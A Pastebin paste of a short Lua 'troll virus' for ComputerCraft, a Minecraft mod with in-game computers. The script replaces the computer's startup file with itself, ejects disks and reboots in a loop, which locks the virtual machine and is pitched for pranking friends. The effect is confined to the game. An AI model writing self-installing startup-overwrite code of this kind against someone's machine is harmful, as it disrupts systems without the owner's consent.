Advertisement
DGCXenroxian

ComputerCraft(minecraft)trollVirus

Dec 19th, 2014
276
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.68 KB | None | 0 0
  1. --Troll Virus. By DGC Xenorexian, 2014. Use at own risk. The counter program will be available soon.
  2. --This is actually 3 files mashed into one, but you get the idea.. Have fun trolling your freinds!
  3.  
  4. --Main file:
  5. shell.run("delete startup")
  6. shell.run("cp disk/troll startup")
  7. shell.run("cp disk/finish fin0357012") --random name
  8. shell.run("fin0357012")
  9.  
  10. --The "disk/finish" file:
  11. shell.run("eject top") --boring part, with a lot of repetetion
  12. shell.run("eject bottom")
  13. shell.run("eject left")
  14. shell.run("eject right")
  15. shell.run("eject front")
  16. shell.run("eject back")
  17. shell.run("reboot")
  18.  
  19. --The "disk/troll" file:
  20. shell.run("fin0357012")
  21. shell.run("clear")
  22. shell.run("reboot")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement